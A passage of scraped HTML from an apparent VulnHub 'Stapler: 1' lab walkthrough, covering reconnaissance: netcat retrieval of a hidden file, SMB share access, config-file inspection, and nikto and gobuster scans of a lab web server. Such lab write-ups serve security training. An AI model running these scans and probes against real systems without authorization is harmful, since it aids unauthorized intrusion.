title=\"VulnHub: STAPLER: 1\u63d2\u56fe48\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe48\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"897\" height=\"338\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"625b\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Read file<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"121a\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">cat todo-list.txt<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ahr\">\n<div class=\"kc s ao kd\">\n<div class=\"ahs kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*17IqJQ8cD_18LaBRDVHO-Q.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"717\" height=\"75\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe49\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe49\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"717\" height=\"75\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"9e91\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">cat vsftpd.conf<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aht\">\n<div class=\"kc s ao kd\">\n<div class=\"ahu kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*abKVPq6BI7IOLSS9Z73Unw.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"878\" height=\"656\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe50\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe50\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"878\" height=\"656\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"f826\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Unzip WordPress and read its configuration file<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"4f83\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">tar -xzvf wordpress-4.tar.gz<\/span><span id=\"fd17\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">cd wordpress<\/span><span id=\"ae00\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">find . -name '*.php' | grep config<\/span><span id=\"dd31\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">cat .\/wp-config-sample.php<\/span><\/pre>\n<p id=\"6540\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Nothing<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev afu\">\n<div class=\"kc s ao kd\">\n<div class=\"ahv kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*OYczP600QL6sHBZWYA-mew.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1027\" height=\"780\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe51\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe51\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1541\/1*OYczP600QL6sHBZWYA-mew.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*OYczP600QL6sHBZWYA-mew.png 276w, https:\/\/miro.medium.com\/max\/828\/1*OYczP600QL6sHBZWYA-mew.png 552w, https:\/\/miro.medium.com\/max\/960\/1*OYczP600QL6sHBZWYA-mew.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*OYczP600QL6sHBZWYA-mew.png 700w\" width=\"1027\" height=\"780\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe52\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe52\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<ul class=\"\">\n<li id=\"c7c9\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 666 doom<\/li>\n<\/ul>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"a135\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">nc -nv 10.0.2.31 666<\/span><\/pre>\n<p id=\"6fdc\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">There\u2019s a file.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ahw\">\n<div class=\"kc s ao kd\">\n<div class=\"ahx kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*IM6phcjeMaTOmGm2B4pIuw.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1250\" height=\"788\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe53\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe53\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1875\/1*IM6phcjeMaTOmGm2B4pIuw.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*IM6phcjeMaTOmGm2B4pIuw.png 276w, https:\/\/miro.medium.com\/max\/828\/1*IM6phcjeMaTOmGm2B4pIuw.png 552w, https:\/\/miro.medium.com\/max\/960\/1*IM6phcjeMaTOmGm2B4pIuw.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*IM6phcjeMaTOmGm2B4pIuw.png 700w\" width=\"1250\" height=\"788\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe54\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe54\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"c66b\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Connect and retrieve the file<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"b87a\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">nc -nv 10.0.2.31 666 &gt; message.jpg<\/span><span id=\"d33a\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">ls -la<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ahy\">\n<div class=\"kc s ao kd\">\n<div class=\"ahz kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*bZ31w-hMcw2RpdSsdBxsyA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"722\" height=\"92\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe55\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe55\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1083\/1*bZ31w-hMcw2RpdSsdBxsyA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*bZ31w-hMcw2RpdSsdBxsyA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*bZ31w-hMcw2RpdSsdBxsyA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*bZ31w-hMcw2RpdSsdBxsyA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*bZ31w-hMcw2RpdSsdBxsyA.png 700w\" width=\"722\" height=\"92\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe56\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe56\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"642a\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Read file\u2019s metadata<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"3327\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">exiftool message.jpg<\/span><\/pre>\n<p id=\"7ae6\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">It\u2019s a zip file.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev aia\">\n<div class=\"kc s ao kd\">\n<div class=\"aib kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*gDz1vzcIWneyP9lBVjAe3g.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"696\" height=\"505\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe57\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe57\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1044\/1*gDz1vzcIWneyP9lBVjAe3g.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 696px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*gDz1vzcIWneyP9lBVjAe3g.png 276w, https:\/\/miro.medium.com\/max\/828\/1*gDz1vzcIWneyP9lBVjAe3g.png 552w, https:\/\/miro.medium.com\/max\/960\/1*gDz1vzcIWneyP9lBVjAe3g.png 640w, https:\/\/miro.medium.com\/max\/1044\/1*gDz1vzcIWneyP9lBVjAe3g.png 696w\" width=\"696\" height=\"505\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe58\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe58\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"2652\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Unzip it<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"8d7a\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">unzip message.jpg<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aic\">\n<div class=\"kc s ao kd\">\n<div class=\"aid kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*B6Kpnc521wGzsfTJCl8U9A.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"785\" height=\"610\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe59\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe59\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"785\" height=\"610\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"6132\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Open it.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev aie\">\n<div class=\"kc s ao kd\">\n<div class=\"aif kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*ET5qUy85jdG7iZonNs_Btw.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"473\" height=\"399\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe60\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe60\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"473\" height=\"399\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"3051\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Connect another accessible directory, \/tmp<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"2c3a\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">smbclient \/\/10.0.2.31\/tmp<\/span><\/pre>\n<p id=\"da90\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">It\u2019s a program called \u2018ls\u2019, not much useful.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aig\">\n<div class=\"kc s ao kd\">\n<div class=\"aih kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*1zjNtOtgBdVpfNWHcWHg0g.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"847\" height=\"246\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe61\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe61\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1271\/1*1zjNtOtgBdVpfNWHcWHg0g.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*1zjNtOtgBdVpfNWHcWHg0g.png 276w, https:\/\/miro.medium.com\/max\/828\/1*1zjNtOtgBdVpfNWHcWHg0g.png 552w, https:\/\/miro.medium.com\/max\/960\/1*1zjNtOtgBdVpfNWHcWHg0g.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*1zjNtOtgBdVpfNWHcWHg0g.png 700w\" width=\"847\" height=\"246\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe62\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe62\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<ul class=\"\">\n<li id=\"83a4\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 3306 MySQL 5.7.12\u20130ubuntu1<\/li>\n<\/ul>\n<p id=\"3299\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I cannot access this right now.<\/p>\n<ul class=\"\">\n<li id=\"1b7d\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 12380 Apache httpd 2.4.18 ((Ubuntu))<\/li>\n<\/ul>\n<p id=\"0823\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Nikto<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"301c\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">nikto -h http:\/\/10.0.2.31:12380<\/span><\/pre>\n<p id=\"95b8\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">It\u2019s an HTTPS site.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aii\">\n<div class=\"kc s ao kd\">\n<div class=\"aij kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*1Nxrgn4lI3s2NX2kYCmQAA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1894\" height=\"778\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe63\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe63\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2841\/1*1Nxrgn4lI3s2NX2kYCmQAA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*1Nxrgn4lI3s2NX2kYCmQAA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*1Nxrgn4lI3s2NX2kYCmQAA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*1Nxrgn4lI3s2NX2kYCmQAA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*1Nxrgn4lI3s2NX2kYCmQAA.png 700w\" width=\"1894\" height=\"778\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe64\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe64\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"9019\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Nikto again<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"3eaa\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">nikto -h <a class=\"ds li\" href=\"https:\/\/byy3.com\/go\/?url=https:\/\/10.0.2.31:12380\/\" rel=\"noopener nofollow\" rel=\"nofollow\" >https:\/\/10.0.2.31:12380<\/a><\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aik\">\n<div class=\"kc s ao kd\">\n<div class=\"ail kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*vd1eyVsUQPuk2IepxEbDSg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1849\" height=\"654\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe65\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe65\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2774\/1*vd1eyVsUQPuk2IepxEbDSg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*vd1eyVsUQPuk2IepxEbDSg.png 276w, https:\/\/miro.medium.com\/max\/828\/1*vd1eyVsUQPuk2IepxEbDSg.png 552w, https:\/\/miro.medium.com\/max\/960\/1*vd1eyVsUQPuk2IepxEbDSg.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*vd1eyVsUQPuk2IepxEbDSg.png 700w\" width=\"1849\" height=\"654\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe66\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe66\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aim\">\n<div class=\"kc s ao kd\">\n<div class=\"ain kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*EPvoipBXgddZVr2MHPEp5Q.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1860\" height=\"561\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe67\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe67\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2790\/1*EPvoipBXgddZVr2MHPEp5Q.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*EPvoipBXgddZVr2MHPEp5Q.png 276w, https:\/\/miro.medium.com\/max\/828\/1*EPvoipBXgddZVr2MHPEp5Q.png 552w, https:\/\/miro.medium.com\/max\/960\/1*EPvoipBXgddZVr2MHPEp5Q.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*EPvoipBXgddZVr2MHPEp5Q.png 700w\" width=\"1860\" height=\"561\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe68\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe68\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"00a6\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Directory enumeration<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"e9d9\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">gobuster dir --wordlist \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt -u <a class=\"ds li\" href=\"https:\/\/byy3.com\/go\/?url=https:\/\/10.0.2.31:12380\/\" rel=\"noopener nofollow\" rel=\"nofollow\" >https:\/\/10.0.2.31:12380\/<\/a> -x php,txt,html,sh,cgi -q -k<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aio\">\n<div class=\"kc s ao kd\">\n<div class=\"aip kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*BRPilGz89USJWSL4gCD6EQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1855\" height=\"246\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe69\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe69\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2783\/1*BRPilGz89USJWSL4gCD6EQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*BRPilGz89USJWSL4gCD6EQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*BRPilGz89USJWSL4gCD6EQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*BRPilGz89USJWSL4gCD6EQ.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*BRPilGz89USJWSL4gCD6EQ.png 700w\" width=\"1855\" height=\"246\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe70\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe70\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"249c\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Access the site<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aiq\">\n<div class=\"kc s ao kd\">\n<div class=\"air kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*TpDLKQtFF_QWrxXK4SAy5A.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"645\" height=\"202\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe71\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe71\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"645\" height=\"202\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"0618\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Access \/admin112233\/<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ais\">\n<div class=\"kc s ao kd\">\n<div class=\"ait kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*2VPNK8tEwH31Q6ZPH3j1Qg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1559\" height=\"600\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe72\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe72\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"1559\" height=\"600\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"af3b\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Access \/blogblog\/<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aiu\">\n<div class=\"kc s ao kd\">\n<div class=\"aiv kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" 